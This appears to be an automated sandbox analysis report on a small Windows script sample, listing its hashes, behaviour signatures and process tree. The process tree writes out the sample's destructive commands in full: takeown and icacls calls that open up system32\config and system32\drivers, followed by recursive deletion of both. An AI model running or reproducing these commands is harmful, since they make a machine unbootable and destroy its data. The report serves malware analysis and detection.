Analysis
-
max time kernel
149s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
15-08-2024 21:30
Static task
static1
Behavioral task
behavioral1
Sample
script.wsf
Resource
win7-20240708-en
General
-
Target
script.wsf
-
Size
2KB
-
MD5
cef6ac1c7b72212cb9b26421ba748362
-
SHA1
05858a591fc90a1af835454aee11b7d893649517
-
SHA256
92a5545652c35328d20dc8bb70348ebda3b1eb49b1c0f111976ab3912de1801a
-
SHA512
435bcf3fa63381455db93dc4f13be02a276e351721a726fcea1c5a2ef93037e09bac09c5dbaf76b1ceb9e97a39d360a73fd9a7316f32b1c582e4bc738fe21e1c
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exetakeown.exeicacls.exeicacls.exepid process 3512 takeown.exe 3948 takeown.exe 3188 icacls.exe 3468 icacls.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation WScript.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
icacls.exeicacls.exetakeown.exetakeown.exepid process 3188 icacls.exe 3468 icacls.exe 3948 takeown.exe 3512 takeown.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings cmd.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
takeown.exedescription pid process Token: SeTakeOwnershipPrivilege 3512 takeown.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
cmd.exeWScript.execmd.execmd.exedescription pid process target process PID 2856 wrote to memory of 5056 2856 cmd.exe WScript.exe PID 2856 wrote to memory of 5056 2856 cmd.exe WScript.exe PID 5056 wrote to memory of 3152 5056 WScript.exe cmd.exe PID 5056 wrote to memory of 3152 5056 WScript.exe cmd.exe PID 5056 wrote to memory of 4652 5056 WScript.exe cmd.exe PID 5056 wrote to memory of 4652 5056 WScript.exe cmd.exe PID 3152 wrote to memory of 3948 3152 cmd.exe takeown.exe PID 3152 wrote to memory of 3948 3152 cmd.exe takeown.exe PID 4652 wrote to memory of 3512 4652 cmd.exe takeown.exe PID 4652 wrote to memory of 3512 4652 cmd.exe takeown.exe PID 3152 wrote to memory of 3188 3152 cmd.exe icacls.exe PID 3152 wrote to memory of 3188 3152 cmd.exe icacls.exe PID 4652 wrote to memory of 3468 4652 cmd.exe icacls.exe PID 4652 wrote to memory of 3468 4652 cmd.exe icacls.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "copy C:\Users\Admin\AppData\Local\Temp\script.wsf thescript.vbs && start thescript.vbs"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\config\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3948
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\config\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:4652 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\drivers\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3512
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\drivers\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3468
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5cef6ac1c7b72212cb9b26421ba748362
SHA105858a591fc90a1af835454aee11b7d893649517
SHA25692a5545652c35328d20dc8bb70348ebda3b1eb49b1c0f111976ab3912de1801a
SHA512435bcf3fa63381455db93dc4f13be02a276e351721a726fcea1c5a2ef93037e09bac09c5dbaf76b1ceb9e97a39d360a73fd9a7316f32b1c582e4bc738fe21e1c